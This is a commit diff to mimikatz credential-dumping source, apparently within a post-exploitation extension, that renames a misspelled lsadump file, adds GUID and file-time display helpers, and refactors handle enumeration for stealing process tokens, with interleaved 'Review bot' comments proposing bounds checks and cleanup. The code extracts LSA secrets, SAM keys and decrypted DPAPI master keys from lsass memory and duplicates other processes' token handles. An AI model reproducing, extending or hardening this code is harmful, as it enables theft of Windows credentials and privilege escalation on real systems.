Merge from source r104, fix silly typo in file name
This commit is contained in:
parent
c3e57bb6c1
commit
2b2508b8c9
@ -13,7 +13,7 @@
|
||||
#include "modules/kuhl_m_service.h"
|
||||
#include "modules/kuhl_m_privilege.h"
|
||||
#include "modules/kuhl_m_process.h"
|
||||
#include "modules/khul_m_lsadump.h"
|
||||
#include "modules/kuhl_m_lsadump.h"
|
||||
#include "modules/kuhl_m_ts.h"
|
||||
#include "modules/kuhl_m_event.h"
|
||||
#include "modules/kuhl_m_misc.h"
|
||||
|
@ -3,7 +3,7 @@
|
||||
benjamin@gentilkiwi.com
|
||||
Licence : http://creativecommons.org/licenses/by/3.0/fr/
|
||||
*/
|
||||
#include "khul_m_lsadump.h"
|
||||
#include "kuhl_m_lsadump.h"
|
||||
|
||||
const KUHL_M_C kuhl_m_c_lsadump[] = {
|
||||
{kuhl_m_lsadump_sam, L"sam", L"Get the SysKey to decrypt SAM entries (from registry or hives)"},
|
||||
@ -409,13 +409,11 @@ BOOL kuhl_m_lsadump_getLsaKeyAndSecrets(IN PKULL_M_REGISTRY_HANDLE hSecurity, IN
|
||||
if(nt6keysStream = (PNT6_SYSTEM_KEYS) LocalAlloc(LPTR, ((PNT6_HARD_SECRET) buffer)->clearSecret.SecretSize))
|
||||
{
|
||||
RtlCopyMemory(nt6keysStream, ((PNT6_HARD_SECRET) buffer)->clearSecret.Secret, ((PNT6_HARD_SECRET) buffer)->clearSecret.SecretSize);
|
||||
kprintf(L"LSA Key(s) : %u, default {%08x-%04hx-%04hx-%02x%02x-%02x%02x%02x%02x%02x%02x}\n", nt6keysStream->nbKeys, nt6keysStream->CurrentKeyID.Data1, nt6keysStream->CurrentKeyID.Data2, nt6keysStream->CurrentKeyID.Data3, nt6keysStream->CurrentKeyID.Data4[0], nt6keysStream->CurrentKeyID.Data4[1], nt6keysStream->CurrentKeyID.Data4[2], nt6keysStream->CurrentKeyID.Data4[3], nt6keysStream->CurrentKeyID.Data4[4], nt6keysStream->CurrentKeyID.Data4[5], nt6keysStream->CurrentKeyID.Data4[6], nt6keysStream->CurrentKeyID.Data4[7]);
|
||||
kprintf(L"LSA Key(s) : %u, default ", nt6keysStream->nbKeys); kull_m_string_displayGUID(&nt6keysStream->CurrentKeyID); kprintf(L"\n");
|
||||
for(i = 0, offset = 0; i < nt6keysStream->nbKeys; i++, offset += FIELD_OFFSET(NT6_SYSTEM_KEY, Key) + nt6key->KeySize)
|
||||
{
|
||||
nt6key = (PNT6_SYSTEM_KEY) ((PBYTE) nt6keysStream->Keys + offset);
|
||||
kprintf(L" [%02u] {%08x-%04hx-%04hx-%02x%02x-%02x%02x%02x%02x%02x%02x} ", i, nt6key->KeyId.Data1, nt6key->KeyId.Data2, nt6key->KeyId.Data3, nt6key->KeyId.Data4[0], nt6key->KeyId.Data4[1], nt6key->KeyId.Data4[2], nt6key->KeyId.Data4[3], nt6key->KeyId.Data4[4], nt6key->KeyId.Data4[5], nt6key->KeyId.Data4[6], nt6key->KeyId.Data4[7]);
|
||||
kull_m_string_wprintf_hex(nt6key->Key, nt6key->KeySize, 0);
|
||||
kprintf(L"\n");
|
||||
kprintf(L" [%02u] ", i); kull_m_string_displayGUID(&nt6key->KeyId); kprintf(L" "); kull_m_string_wprintf_hex(nt6key->Key, nt6key->KeySize, 0); kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
}
|
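Review bot: The key loop `for(i = 0, offset = 0; i < nt6keysStream->nbKeys; ...)` trusts `nbKeys` and each `nt6key->KeySize` read out of the decrypted secret and never checks that `offset + FIELD_OFFSET(NT6_SYSTEM_KEY, Key) + nt6key->KeySize` stays inside `clearSecret.SecretSize`, so a truncated or malformed secret (a damaged hive, for instance) makes `kull_m_string_wprintf_hex` read past the `LocalAlloc` buffer. A guard at the top of the body such as `if(offset + FIELD_OFFSET(NT6_SYSTEM_KEY, Key) > secretSize || nt6key->KeySize > secretSize - offset - FIELD_OFFSET(NT6_SYSTEM_KEY, Key)) break;` (with `secretSize` saved from `clearSecret.SecretSize` before the `RtlCopyMemory`) keeps every read bounded. The same check is needed once before `nt6keysStream->nbKeys` is dereferenced, against `FIELD_OFFSET(NT6_SYSTEM_KEYS, Keys)`. `kuhl_m_lsadump_getLsaKeyAndSecrets` starts and ends outside the hunk.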
@ -45,9 +45,9 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hLocalMemory}, aKey = {NULL, &hLocalMemory}, aLsass = {NULL, pData->cLsass->hLsassMem};
|
||||
PKUHL_M_SEKURLSA_PACKAGE pPackage = (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package;
|
||||
SYSTEMTIME sTime;
|
||||
DWORD monNb = 0;
|
||||
if((pData->LogonType != Network)/* && pData->LogonType != UndefinedLogonType*/)
|
||||
|
||||
if(pData->LogonType != Network)
|
||||
{
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
if(pPackage->Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &pPackage->Module, MasterKeyCacheReferences, sizeof(MasterKeyCacheReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &pMasterKeyCacheList, NULL, NULL))
|
||||
@ -62,21 +62,17 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_
|
||||
{
|
||||
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
|
||||
{
|
||||
kprintf(L"\t [%08x] ", monNb++);
|
||||
kprintf(L"\n\t * GUID :\t{%08x-%04hx-%04hx-%02x%02x-%02x%02x%02x%02x%02x%02x}", mesCredentials.KeyUid.Data1, mesCredentials.KeyUid.Data2, mesCredentials.KeyUid.Data3, mesCredentials.KeyUid.Data4[0], mesCredentials.KeyUid.Data4[1], mesCredentials.KeyUid.Data4[2], mesCredentials.KeyUid.Data4[3], mesCredentials.KeyUid.Data4[4], mesCredentials.KeyUid.Data4[5], mesCredentials.KeyUid.Data4[6], mesCredentials.KeyUid.Data4[7]);
|
||||
if(FileTimeToSystemTime(&mesCredentials.insertTime, &sTime))
|
||||
{
|
||||
kprintf(L"\n\t * Time :\t%02hu/%02hu/%04hu %02hu:%02hu:%02hu,%hu", sTime.wDay, sTime.wMonth, sTime.wYear, sTime.wHour, sTime.wMinute, sTime.wSecond, sTime.wMilliseconds);
|
||||
}
|
||||
kprintf(L"\t [%08x]\n\t * GUID :\t", monNb++);
|
||||
kull_m_string_displayGUID(&mesCredentials.KeyUid);
|
||||
kprintf(L"\n\t * Time :\t"); kull_m_string_displayFileTime(&mesCredentials.insertTime);
|
||||
|
||||
if(aKey.address = LocalAlloc(LPTR, mesCredentials.keySize))
|
||||
{
|
||||
aLsass.address = (PBYTE) aLsass.address + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key);
|
||||
|
||||
if(kull_m_memory_copy(&aKey, &aLsass, mesCredentials.keySize))
|
||||
{
|
||||
(*pData->lsassLocalHelper->pLsaUnprotectMemory)(aKey.address, mesCredentials.keySize);
|
||||
kprintf(L"\n\t * Key :\t"); kull_m_string_wprintf_hex(aKey.address, mesCredentials.keySize, 1);
|
||||
kprintf(L"\n\t * Key :\t"); kull_m_string_wprintf_hex(aKey.address, mesCredentials.keySize, 0);
|
||||
}
|
||||
LocalFree(aKey.address);
|
||||
}
|
||||
@ -91,4 +87,4 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_
|
||||
kprintf(L"\n");
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
}
|
||||
|
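Review bot: The decrypted master key that `pLsaUnprotectMemory` leaves in `aKey.address` is released with a plain `LocalFree(aKey.address);`, so the cleartext key bytes stay in freed heap memory; `SecureZeroMemory(aKey.address, mesCredentials.keySize);` before the `LocalFree` is the usual hygiene for secret buffers. The same pattern appears in `kuhl_m_sekurlsa_enum_logon_callback_masterkeys` further down, where `buffer` is freed right after `kuhl_m_sekurlsa_nt6_LsaUnprotectMemory`. Also, a failed `LocalAlloc` or `kull_m_memory_copy` in this hunk prints nothing, so an entry with no `* Key :` line cannot be told apart from a successful one; an `else kprintf(L"\n\t * Key :\t(unavailable)");` on each branch would mirror the other fields. The enclosing callback `kuhl_m_sekurlsa_enum_callback_dpapi` starts outside the hunks shown.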
@ -131,7 +131,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMaste
|
||||
ULONG_PTR ptr;
|
||||
ULONG monNb = 0;
|
||||
PBYTE buffer;
|
||||
SYSTEMTIME sTime;
|
||||
|
||||
if(ReadMemory(pMasterKeyCacheList, &mesCredentials, sizeof(LIST_ENTRY), NULL))
|
||||
{
|
||||
ptr = (ULONG_PTR) mesCredentials.Flink;
|
||||
@ -141,18 +141,16 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMaste
|
||||
{
|
||||
if(RtlEqualLuid(logId, &mesCredentials.LogonId))
|
||||
{
|
||||
dprintf("\n\t [%08x] ", monNb++);
|
||||
dprintf("\n\t * GUID :\t{%08x-%04hx-%04hx-%02x%02x-%02x%02x%02x%02x%02x%02x}", mesCredentials.KeyUid.Data1, mesCredentials.KeyUid.Data2, mesCredentials.KeyUid.Data3, mesCredentials.KeyUid.Data4[0], mesCredentials.KeyUid.Data4[1], mesCredentials.KeyUid.Data4[2], mesCredentials.KeyUid.Data4[3], mesCredentials.KeyUid.Data4[4], mesCredentials.KeyUid.Data4[5], mesCredentials.KeyUid.Data4[6], mesCredentials.KeyUid.Data4[7]);
|
||||
if(FileTimeToSystemTime(&mesCredentials.insertTime, &sTime))
|
||||
{
|
||||
dprintf("\n\t * Time :\t%02hu/%02hu/%04hu %02hu:%02hu:%02hu,%hu", sTime.wDay, sTime.wMonth, sTime.wYear, sTime.wHour, sTime.wMinute, sTime.wSecond, sTime.wMilliseconds);
|
||||
}
|
||||
dprintf("\n\t [%08x]\n\t * GUID :\t", monNb++);
|
||||
kull_m_string_displayGUID(&mesCredentials.KeyUid);
|
||||
dprintf("\n\t * Time :\t"); kull_m_string_displayFileTime(&mesCredentials.insertTime);
|
||||
|
||||
if(buffer = (PBYTE) LocalAlloc(LPTR, mesCredentials.keySize))
|
||||
{
|
||||
if(ReadMemory(ptr + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key), buffer, mesCredentials.keySize, NULL))
|
||||
{
|
||||
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer, mesCredentials.keySize);
|
||||
dprintf("\n\t * Key :\t"); kull_m_string_dprintf_hex(buffer, mesCredentials.keySize, 1);
|
||||
dprintf("\n\t * Key :\t"); kull_m_string_dprintf_hex(buffer, mesCredentials.keySize, 0);
|
||||
}
|
||||
LocalFree(buffer);
|
||||
}
|
||||
@ -163,4 +161,4 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMaste
|
||||
}
|
||||
}
|
||||
else dprintf("KO");
|
||||
}
|
||||
}
|
||||
|
@ -20,6 +20,42 @@ void kull_m_string_dprintf_hex(LPCVOID lpData, DWORD cbData, DWORD flags)
|
||||
dprintf(pType, ((LPCBYTE) lpData)[i]);
|
||||
}
|
||||
|
||||
void kull_m_string_displayFileTime(IN PFILETIME pFileTime)
|
||||
{
|
||||
SYSTEMTIME st;
|
||||
char buffer[0xff];
|
||||
if(pFileTime)
|
||||
{
|
||||
if(FileTimeToSystemTime(pFileTime, &st ))
|
||||
{
|
||||
if(GetDateFormatA(LOCALE_USER_DEFAULT, 0, &st, NULL, buffer, sizeof(buffer)))
|
||||
{
|
||||
dprintf("%s ", buffer);
|
||||
if(GetTimeFormatA(LOCALE_USER_DEFAULT, 0, &st, NULL, buffer, sizeof(buffer)))
|
||||
dprintf("%s", buffer);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void kull_m_string_displayLocalFileTime(IN PFILETIME pFileTime)
|
||||
{
|
||||
FILETIME ft;
|
||||
if(pFileTime)
|
||||
if(FileTimeToLocalFileTime(pFileTime, &ft))
|
||||
kull_m_string_displayFileTime(&ft);
|
||||
}
|
||||
|
||||
void kull_m_string_displayGUID(IN LPCGUID pGuid)
|
||||
{
|
||||
UNICODE_STRING uString;
|
||||
if(NT_SUCCESS(RtlStringFromGUID(pGuid, &uString)))
|
||||
{
|
||||
dprintf("%wZ", &uString);
|
||||
RtlFreeUnicodeString(&uString);
|
||||
}
|
||||
}
|
||||
|
||||
BOOL kull_m_string_suspectUnicodeString(IN PUNICODE_STRING pUnicodeString)
|
||||
{
|
||||
int unicodeTestFlags = IS_TEXT_UNICODE_ODD_LENGTH | IS_TEXT_UNICODE_STATISTICS;
|
||||
@ -134,4 +170,4 @@ BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid)
|
||||
status = ReadMemory(buffer, *pSid, sizeSid, NULL);
|
||||
}
|
||||
return status;
|
||||
}
|
||||
}
|
||||
|
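Review bot: `kull_m_string_displayFileTime` prints nothing when `FileTimeToSystemTime` or `GetDateFormatA` fails, so a caller that has just emitted `"\n\t * Time :\t"` (as both sekurlsa callbacks in this commit do) ends with an empty field that looks like a blank timestamp; an `else dprintf("(invalid)");` on the conversion branch, or a BOOL return, would let callers tell the cases apart. `kull_m_string_displayLocalFileTime` nests two brace-less `if`s; `if(pFileTime && FileTimeToLocalFileTime(pFileTime, &ft))` reads the same and cannot grow a dangling else. None of the three new helpers carries a header comment; a one-liner on each, e.g. `// Prints pFileTime as locale date and time via dprintf, no trailing newline; silent on conversion failure`, would document the formatting contract the callers rely on.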
@ -154,6 +154,9 @@ typedef struct _KIWI_MSV1_0_LIST_63 {
|
||||
|
||||
#define RtlEqualLuid(L1, L2) (((L1)->LowPart == (L2)->LowPart) && ((L1)->HighPart == (L2)->HighPart))
|
||||
extern BOOLEAN WINAPI RtlEqualString(IN const STRING *String1, IN const STRING *String2, IN BOOLEAN CaseInSensitive);
|
||||
extern VOID WINAPI RtlFreeUnicodeString(IN PUNICODE_STRING UnicodeString);
|
||||
extern NTSTATUS WINAPI RtlStringFromGUID(IN LPCGUID Guid, PUNICODE_STRING UnicodeString);
|
||||
|
||||
#define LM_NTLM_HASH_LENGTH 16
|
||||
#define SHA_DIGEST_LENGTH 20
|
||||
|
||||
@ -164,5 +167,8 @@ void kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PL
|
||||
|
||||
BOOL kull_m_string_getDbgUnicodeString(IN PUNICODE_STRING string);
|
||||
void kull_m_string_dprintf_hex(LPCVOID lpData, DWORD cbData, DWORD flags);
|
||||
void kull_m_string_displayFileTime(IN PFILETIME pFileTime);
|
||||
void kull_m_string_displayLocalFileTime(IN PFILETIME pFileTime);
|
||||
void kull_m_string_displayGUID(IN LPCGUID pGuid);
|
||||
BOOL kull_m_string_suspectUnicodeString(IN PUNICODE_STRING pUnicodeString);
|
||||
BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid);
|
||||
BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid);
|
||||
|
@ -13,7 +13,7 @@ VOID kull_m_handle_initialise()
|
||||
NtQueryObject = (NTSTATUS(WINAPI *)(IN OPTIONAL HANDLE Handle, IN OBJECT_INFORMATION_CLASS ObjectInformationClass, OUT OPTIONAL PVOID ObjectInformation, IN ULONG ObjectInformationLength, OUT OPTIONAL PULONG ReturnLength))GetProcAddress(ntDll, "NtQueryObject");
|
||||
}
|
||||
|
||||
NTSTATUS kull_m_handle_getHandles(PKULL_M_HANDLE_ENUM_CALLBACK callBack, PVOID pvArg)
|
||||
NTSTATUS kull_m_handle_getHandles(PKULL_M_SYSTEM_HANDLE_ENUM_CALLBACK callBack, PVOID pvArg)
|
||||
{
|
||||
NTSTATUS status = STATUS_INFO_LENGTH_MISMATCH;
|
||||
ULONG i;
|
||||
@ -32,4 +32,65 @@ NTSTATUS kull_m_handle_getHandles(PKULL_M_HANDLE_ENUM_CALLBACK callBack, PVOID p
|
||||
LocalFree(buffer);
|
||||
}
|
||||
return status;
|
||||
}
|
||||
|
||||
NTSTATUS kull_m_handle_getHandlesOfType(PKULL_M_HANDLE_ENUM_CALLBACK callBack, LPCTSTR type, DWORD dwDesiredAccess, DWORD dwOptions, PVOID pvArg)
|
||||
{
|
||||
UNICODE_STRING uStr;
|
||||
HANDLE_ENUM_DATA data = {NULL, dwDesiredAccess, dwOptions, callBack, pvArg};
|
||||
if(type)
|
||||
{
|
||||
RtlInitUnicodeString(&uStr, type);
|
||||
data.type = &uStr;
|
||||
}
|
||||
return kull_m_handle_getHandles(kull_m_handle_getHandlesOfType_callback, &data);
|
||||
}
|
||||
|
||||
BOOL CALLBACK kull_m_handle_getHandlesOfType_callback(PSYSTEM_HANDLE pSystemHandle, PVOID pvArg)
|
||||
{
|
||||
PHANDLE_ENUM_DATA pData = (PHANDLE_ENUM_DATA) pvArg;
|
||||
BOOL status = TRUE;
|
||||
HANDLE hProcess, hRemoteHandle;
|
||||
POBJECT_TYPE_INFORMATION pInfos;
|
||||
ULONG szNeeded;
|
||||
|
||||
if(hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, pSystemHandle->ProcessId))
|
||||
{
|
||||
if(DuplicateHandle(hProcess, (HANDLE) pSystemHandle->Handle, GetCurrentProcess(), &hRemoteHandle, pData->dwDesiredAccess, TRUE, pData->dwOptions))
|
||||
{
|
||||
if(NtQueryObject(hRemoteHandle, ObjectTypeInformation, NULL, 0, &szNeeded) == STATUS_INFO_LENGTH_MISMATCH)
|
||||
{
|
||||
if(pInfos = (POBJECT_TYPE_INFORMATION) LocalAlloc(LPTR, szNeeded))
|
||||
{
|
||||
if(NT_SUCCESS(NtQueryObject(hRemoteHandle, ObjectTypeInformation, pInfos, szNeeded, &szNeeded)))
|
||||
{
|
||||
if(!pData->type || RtlEqualUnicodeString(&pInfos->TypeName, pData->type, TRUE))
|
||||
status = pData->callBack(hRemoteHandle, pSystemHandle, pData->pvArg);
|
||||
}
|
||||
LocalFree(pInfos);
|
||||
}
|
||||
}
|
||||
CloseHandle(hRemoteHandle);
|
||||
}
|
||||
CloseHandle(hProcess);
|
||||
}
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kull_m_handle_GetUserObjectInformation(HANDLE hObj, int nIndex, PVOID *pvInfo, PDWORD nLength)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD szNeeded;
|
||||
|
||||
if(!GetUserObjectInformation(hObj, nIndex, NULL, 0, &szNeeded) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER) && szNeeded)
|
||||
{
|
||||
if(*pvInfo = LocalAlloc(LPTR, szNeeded))
|
||||
{
|
||||
if(nLength)
|
||||
*nLength = szNeeded;
|
||||
if(!(status = GetUserObjectInformation(hObj, nIndex, *pvInfo, szNeeded, &szNeeded)))
|
||||
LocalFree(*pvInfo);
|
||||
}
|
||||
}
|
||||
return status;
|
||||
}
|
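Review bot: In `kull_m_handle_GetUserObjectInformation` the failure branch `LocalFree(*pvInfo);` leaves `*pvInfo` pointing at freed memory and `*nLength` already set to `szNeeded`, so a caller that tests `*pvInfo` instead of the return value uses a dangling pointer; add `*pvInfo = NULL;` after the `LocalFree` and assign `*nLength` only once the second `GetUserObjectInformation` call has succeeded. In `kull_m_handle_getHandlesOfType_callback`, `DuplicateHandle(..., pData->dwDesiredAccess, TRUE, pData->dwOptions)` requests an inheritable handle although nothing here creates a child process; `FALSE` keeps the duplicate from leaking into anything spawned later. `kull_m_handle_getHandlesOfType` takes `LPCTSTR type` but hands it straight to `RtlInitUnicodeString`, which expects a wide string, so `LPCWSTR type` states the real contract and matches the `L"Token"` literal the token module passes.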
@ -58,7 +58,21 @@ typedef struct _SYSTEM_HANDLE_INFORMATION
|
||||
SYSTEM_HANDLE Handles[ANYSIZE_ARRAY];
|
||||
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
|
||||
|
||||
typedef BOOL (CALLBACK * PKULL_M_HANDLE_ENUM_CALLBACK) (PSYSTEM_HANDLE pSystemHandle, PVOID pvArg);
|
||||
typedef BOOL (CALLBACK * PKULL_M_SYSTEM_HANDLE_ENUM_CALLBACK) (PSYSTEM_HANDLE pSystemHandle, PVOID pvArg);
|
||||
typedef BOOL (CALLBACK * PKULL_M_HANDLE_ENUM_CALLBACK) (HANDLE handle, PSYSTEM_HANDLE pSystemHandle, PVOID pvArg);
|
||||
|
||||
typedef struct _HANDLE_ENUM_DATA
|
||||
{
|
||||
PCUNICODE_STRING type;
|
||||
DWORD dwDesiredAccess;
|
||||
DWORD dwOptions;
|
||||
PKULL_M_HANDLE_ENUM_CALLBACK callBack;
|
||||
PVOID pvArg;
|
||||
} HANDLE_ENUM_DATA, *PHANDLE_ENUM_DATA;
|
||||
|
||||
NTSTATUS kull_m_handle_getHandles(PKULL_M_SYSTEM_HANDLE_ENUM_CALLBACK callBack, PVOID pvArg);
|
||||
NTSTATUS kull_m_handle_getHandlesOfType(PKULL_M_HANDLE_ENUM_CALLBACK callBack, LPCTSTR type, DWORD dwDesiredAccess, DWORD dwOptions, PVOID pvArg);
|
||||
|
||||
BOOL CALLBACK kull_m_handle_getHandlesOfType_callback(PSYSTEM_HANDLE pSystemHandle, PVOID pvArg);
|
||||
|
||||
NTSTATUS kull_m_handle_getHandles(PKULL_M_HANDLE_ENUM_CALLBACK callBack, PVOID pvArg);
|
||||
VOID kull_m_handle_initialise();
|
@ -56,7 +56,7 @@ BOOL kull_m_token_getTokens(PKULL_M_TOKEN_ENUM_CALLBACK callBack, PVOID pvArg)
|
||||
KULL_M_TOKEN_ENUM_DATA data = {callBack, pvArg, TRUE};
|
||||
if(status = NT_SUCCESS(kull_m_process_getProcessInformation(kull_m_token_getTokens_process_callback, &data)))
|
||||
if(data.mustContinue)
|
||||
status = NT_SUCCESS(kull_m_handle_getHandles(kull_m_token_getTokens_handles_callback, &data));
|
||||
status = NT_SUCCESS(kull_m_handle_getHandlesOfType(kull_m_token_getTokens_handles_callback, L"Token", TOKEN_QUERY | TOKEN_DUPLICATE, 0, &data));
|
||||
return status;
|
||||
}
|
||||
|
||||
@ -74,36 +74,10 @@ BOOL CALLBACK kull_m_token_getTokens_process_callback(PSYSTEM_PROCESS_INFORMATIO
|
||||
}
|
||||
CloseHandle(hProcess);
|
||||
}
|
||||
((PKULL_M_TOKEN_ENUM_DATA) pvArg)->mustContinue = status;
|
||||
return status;
|
||||
return (((PKULL_M_TOKEN_ENUM_DATA) pvArg)->mustContinue = status);
|
||||
}
|
||||
|
||||
CONST UNICODE_STRING kull_m_token_strToken = {10, 12, L"Token"};
|
||||
BOOL CALLBACK kull_m_token_getTokens_handles_callback(PSYSTEM_HANDLE pSystemHandle, PVOID pvArg)
|
||||
BOOL CALLBACK kull_m_token_getTokens_handles_callback(HANDLE handle, PSYSTEM_HANDLE pSystemHandle, PVOID pvArg)
|
||||
{
|
||||
BOOL status = TRUE;
|
||||
HANDLE hProcess, hRemoteHandle;
|
||||
POBJECT_TYPE_INFORMATION pInfos;
|
||||
ULONG szNeeded;
|
||||
|
||||
if(hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, pSystemHandle->ProcessId))
|
||||
{
|
||||
if(DuplicateHandle(hProcess, (HANDLE) pSystemHandle->Handle, GetCurrentProcess(), &hRemoteHandle, TOKEN_QUERY | TOKEN_DUPLICATE, TRUE, 0))
|
||||
{
|
||||
if(NtQueryObject(hRemoteHandle, ObjectTypeInformation, NULL, 0, &szNeeded) == STATUS_INFO_LENGTH_MISMATCH)
|
||||
{
|
||||
if(pInfos = (POBJECT_TYPE_INFORMATION) LocalAlloc(LPTR, szNeeded))
|
||||
{
|
||||
if(NT_SUCCESS(NtQueryObject(hRemoteHandle, ObjectTypeInformation, pInfos, szNeeded, &szNeeded)))
|
||||
if(RtlEqualUnicodeString(&pInfos->TypeName, &kull_m_token_strToken, TRUE))
|
||||
status = ((PKULL_M_TOKEN_ENUM_DATA) pvArg)->callback(hRemoteHandle, pSystemHandle->ProcessId, ((PKULL_M_TOKEN_ENUM_DATA) pvArg)->pvArg);
|
||||
LocalFree(pInfos);
|
||||
}
|
||||
}
|
||||
CloseHandle(hRemoteHandle);
|
||||
}
|
||||
CloseHandle(hProcess);
|
||||
}
|
||||
((PKULL_M_TOKEN_ENUM_DATA) pvArg)->mustContinue = status;
|
||||
return status;
|
||||
return (((PKULL_M_TOKEN_ENUM_DATA) pvArg)->mustContinue = ((PKULL_M_TOKEN_ENUM_DATA) pvArg)->callback(handle, pSystemHandle->ProcessId, ((PKULL_M_TOKEN_ENUM_DATA) pvArg)->pvArg));
|
||||
}
|
||||
|
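Review bot: The new one-line body of `kull_m_token_getTokens_handles_callback` casts `pvArg` three times in one expression, while the handle module's callback keeps a `pData` local; `PKULL_M_TOKEN_ENUM_DATA pData = (PKULL_M_TOKEN_ENUM_DATA) pvArg; return (pData->mustContinue = pData->callback(handle, pSystemHandle->ProcessId, pData->pvArg));` is the same logic without the repetition, and the `return (((PKULL_M_TOKEN_ENUM_DATA) pvArg)->mustContinue = status);` line in the process callback can use the same local. The callback receives `handle` without owning it — the enumerator in `kull_m_handle_getHandlesOfType_callback` closes it right after the call — which deserves a comment on the function, since user callbacks reached through `callback` must `DuplicateHandle` anything they keep beyond the call. In `kull_m_token_getTokens` the two brace-less nested `if`s before `return status;` would read more clearly as the single condition `if((status = NT_SUCCESS(kull_m_process_getProcessInformation(kull_m_token_getTokens_process_callback, &data))) && data.mustContinue)`.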
@ -18,7 +18,7 @@ typedef struct _KULL_M_TOKEN_ENUM_DATA {
|
||||
|
||||
BOOL kull_m_token_getTokens(PKULL_M_TOKEN_ENUM_CALLBACK callBack, PVOID pvArg);
|
||||
BOOL CALLBACK kull_m_token_getTokens_process_callback(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);
|
||||
BOOL CALLBACK kull_m_token_getTokens_handles_callback(PSYSTEM_HANDLE pSystemHandle, PVOID pvArg);
|
||||
BOOL CALLBACK kull_m_token_getTokens_handles_callback(HANDLE handle, PSYSTEM_HANDLE pSystemHandle, PVOID pvArg);
|
||||
|
||||
BOOL kull_m_token_getNameDomainFromToken(HANDLE hToken, PWSTR * pName, PWSTR * pDomain, PWSTR * pSid, PSID_NAME_USE pSidNameUse);
|
||||
BOOL kull_m_token_getNameDomainFromSID(PSID pSid, PWSTR * pName, PWSTR * pDomain, PSID_NAME_USE pSidNameUse);
|
@ -575,7 +575,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos_pac.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos_ticket.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\khul_m_lsadump.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_lsadump.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_crypto.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_event.h" />
|
||||
@ -630,7 +630,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos_pac.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos_ticket.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\khul_m_lsadump.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_lsadump.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_crypto.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_event.c" />
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_kernel.c" />
|
||||
|
@ -125,9 +125,6 @@
|
||||
<Filter>modules</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\debug.h" />
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\khul_m_lsadump.h">
|
||||
<Filter>modules</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kerberos\khul_m_kerberos_ticket.h">
|
||||
<Filter>modules\kerberos</Filter>
|
||||
</ClInclude>
|
||||
@ -146,6 +143,9 @@
|
||||
<ClInclude Include="..\..\source\extensions\kiwi\modules\kull_m_rpce.h">
|
||||
<Filter>common</Filter>
|
||||
</ClInclude>
|
||||
